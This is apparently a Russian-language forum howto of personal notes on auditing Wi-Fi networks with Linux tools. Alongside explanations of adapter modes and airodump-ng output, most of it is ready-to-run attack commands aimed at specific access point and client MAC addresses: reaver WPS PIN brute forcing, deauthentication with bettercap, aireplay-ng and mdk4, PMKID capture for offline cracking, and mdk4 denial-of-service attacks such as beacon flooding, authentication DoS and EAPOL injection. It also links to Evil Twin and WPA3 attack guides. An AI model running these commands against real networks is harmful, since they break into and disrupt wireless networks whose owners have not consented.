Чагадаев как он есть > Руководства (howto)
[manual, Linux, Wi-Fi]: аудит сетей
adc:
Wi-Fi: аудит WPS
OneShot monitor mode.
чипсет тоже показывает
wash -i wlan1
wifite -i wlan1
1. reaver - перебор пинов
reaver -i wlan1 -b D4:60:E3:E4:C1:86 -vv
bettercap -iface wlan1
--- Код: ---wifi.recon on
set ticker.commands 'clear; wifi.show'
ticker on
wifi.recon.channel 9
wifi.deauth 58:23:8c:7e:ed:13
--- Конец кода ---
Fluxion
• Атаки на WPA2-Enterprise, Rogue AP Evil Twin - https://habr.com/ru/articles/761450/
• Атаки на WPA2-Enterprise, методология взлома WPA3 - https://habr.com/ru/companies/bastion/articles/777182/
adc:
Режимы работы Wi-Fi адаптера
* Managed mode (client mode) — пакеты, не предназначенные этому адаптеру, а также повреждённые, отбрасываются, остальные передаются внутрь ОС. Обычный режим работы.
* Monitor mode (rfmon mode) — драйвер не фильтрует пакеты и передаёт всё, что улавливает антенна, в ОС. Пакеты с неверной контрольной суммой не отбрасываются и их можно увидеть, к примеру, в Wireshark.
* Promiscuous mode («беспорядочный режим») — драйвер передаёт в ОС пакеты, полученные в рамках сети, к которой мы сейчас подключены (associated), но, в отличие от обычного режима, не отбрасывает пакеты, предназначенные другим клиентам этой сети. Пакеты других сетей игнорируются. Как и в managed mode, драйвер убирает из переданных в ОС пакетов низкоуровневые заголовки канала. Режим работает только когда адаптер уже успешно подключён к некоей сети.
★ ★ ★
Отключить в NetworkManager управление интерфейсом wlan1 - для текущего сеанса
--- Код: ---nmcli dev set wlan1 managed no
--- Конец кода ---
Отключить в NetworkManager управление интерфейсом wlan1 - в конфигурационном файле
--- Код: (/etc/NetworkManager/NetworkManager.conf) ---[keyfile]
unmanaged-devices=interface-name:wlan1
--- Конец кода ---
Посмотреть в каком режиме работают Wi-Fi интерфейсы
--- Код: ---iwconfig
--- Конец кода ---
Перевести Wi-Fi интерфейс wlan1 в режим мониторинга - средствами ОС
--- Код: ---ip link set wlan1 down
iw dev wlan1 set type monitor
ip link set wlan1 up
--- Конец кода ---
Перевести Wi-Fi интерфейс wlan1 в режим мониторинга, остановить мешающие процессы - средствами airmon-ng
--- Код: ---airmon-ng check kill
airmon-ng start wlan1
--- Конец кода ---
Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами airmon-ng; запустить NetworkManager и wpa_supplicant
--- Код: ---airmon-ng stop wlan1
systemctl start NetworkManager
systemctl start wpa_supplicant.service
--- Конец кода ---
Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами ОС
--- Код: ---ip link set wlan1 down
iw dev wlan1 set type managed
ip link set wlan1 up
iwconfig
--- Конец кода ---
adc:
Список беспроводных сетей (значения столбцов)
* BSSID — уникальный MAC-адрес беспроводной сети (6 чисел в шестнадцатеричном формате, разделённых двоеточиями).
* PWR — уровень сигнала, отрицательное число, чем ближе к 0 — тем сигнал сильнее. Для комфортной работы — до -50, для видеосвязи — до -65, для VoIP — до -75. Значения ниже -85 и в особенности ниже -90 можно считать крайне слабым уровнем. Зависит как от мощности передатчика, так и от коэффициента усиления антенны в принимающем адаптере (внешние адаптеры имеют усиление 0-12 dB, внешние 1-2-метровые всенаправленные антенны — до 24 dB).
* Beacons — число переданных точкой доступа «маячков» — пакетов, оповещающих находящихся рядом устройств о существовании этой беспроводной сети, уровне сигнала, её имени (BSSID/ESSID) и прочей информации. Используется для подключения. Обычно точки доступа передают маячки каждые 100 мсек (10 раз в секунду), но интервал можно увеличить до 1/сек. Отсутствие маячка не говорит об отсутствии беспроводной сети — в скрытом (hidden) режиме точка доступа не передаёт маячков, но к ней можно подключиться, если знать точное имя сети.
* #Data — число пакетов с данными, которые пришли от этой точки доступа. Это может быть HTTP-трафик, ARP-запросы, запросы на авторизацию (handshake) и прочее. Если к сети не подключен ни один клиент или если он ничего не передаёт, то это значение не меняется и может быть 0.
* #/s — число пакетов с данными в секунду (значение #Data, делённое на время наблюдения за этой сетью).
* CH — номер канала.
* MB — скорость передачи (ширина канала) в Мбит/с. Точка в конце обозначает, что точка доступа поддерживает короткую преамбулу (short preamble). Можно увидеть значения 11, 54, 54e.
* ENC — тип беспроводной сети — OPN (открытая), WEP, WPA, WPA2.
* CIPHER — тип шифрования данных после handshake, TKIP или CCMP.
* AUTH — механизм аутентификации для передачи временного ключа, PSK (обычная авторизация по единому паролю для WPA(2)), MGT (WPA(2) Enterprise с отдельным сервером с ключами RADIUS), OPN (открытая).
* ESSID — имя беспроводной сети. Так как это пользовательское имя, то оно может не быть уникальным, и для всех внутренних операций используется BSSID, а это — просто отображаемое название.
Список беспроводных сетей и клиентов (значения столбцов)
* BSSID — MAC-адрес точки доступа, к которой подключён клиент. Если указано "not associated" — клиент отключён от всех сетей, но адаптер работает (возможно, он ищет доступные сети).
* STATION — MAC-адрес клиента.
* PWR — уровень сигнала от клиента. Чем ближе к 0, тем клиент ближе/сигнал мощнее.
* Rate — когда airodump-ng запущен с фиксацией канала, этот столбец показывает частоту передачи пакетов с данными от точки доступа к клиенту (слева от дефиса) и от клиента обратно (справа).
* Lost — число потерянных пакетов, которые наша система (не клиент) не зарегистрировала. Это легко вычислить, так как в передаваемых пакетах есть счётчик.
* Frames (Packets) — число пакетов с данными, которые мы уловили от этого клиента (см. #Data в первой таблице).
* Probe — список ESSID-имён беспроводных сетей, к которым клиент готов подключиться.
★ ★ ★
Горячие клавиши:
"o" - включить цвет
"s" - изменить сортировку
★ ★ ★
Мониторинг эфира - интерфейс wlan1; диапазоны 2,4 ГГц и 5 ГГц; выводить производителя, параметры WPS и время работы точек доступа
--- Код: ---airodump-ng wlan1 --band abg --wps --manufacturer --uptime
--- Конец кода ---
★ ★ ★
Захват трафика - интерфейс wlan1, канал 1, сохранять пакеты в файл wifi
--- Код: ---airodump-ng wlan1 -c 1 -w wifi
--- Конец кода ---
Захват трафика - интерфейс wlan1, канал 1, точка доступа с BSSID 54..., сохранять пакеты в файл wifi
--- Код: ---airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi
--- Конец кода ---
adc:
Захват PMKID
1) Запустить airodump-ng на нужном интерфейсе и канале
2) Одновременно запустить hcxdumptool
--- Код: ---airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi
hcxdumptool -i wlan1 -c 149b -w pmkid.cap --filterlist_ap=targetBSSID --filtermode=2
hcxdumptool -i wlan1 -c 149b -w pmkid.cap
--- Конец кода ---
adc:
Деаутентификация
--- Код: ---aireplay-ng wlan1 --deauth 20 -a <MAC точки доступа> -c <MAC подключённого клиента>
mdk4 wlan1 d -c <канал> -E <SSID>
mdk4 wlan1 d -c 1 -E 52:FF:20:90:98:C0
--- Конец кода ---
Beacon Flooding (generate many fake APs seen by clients - client confusion, crash network scanners)
--- Код: ---mdk4 wlan1 b -a -w nta -m
--- Конец кода ---
Authentication DoS (ыimulate many clients - freeze/reset AP)
--- Код: ---mdk4 wlan1 a -m -a 52:FF:20:90:98:C0
--- Конец кода ---
EAPOL Start Injection (keep AP busy with fake sessions - disable handling of legitimate clients)
--- Код: ---mdk4 wlan1 e -t 52:FF:20:90:98:C0
--- Конец кода ---
EAPOL Logoff Injection (kick clients from AP)
--- Код: ---mdk4 wlan1 e -t 52:FF:20:90:98:C0 -l
--- Конец кода ---
Навигация
Перейти к полной версии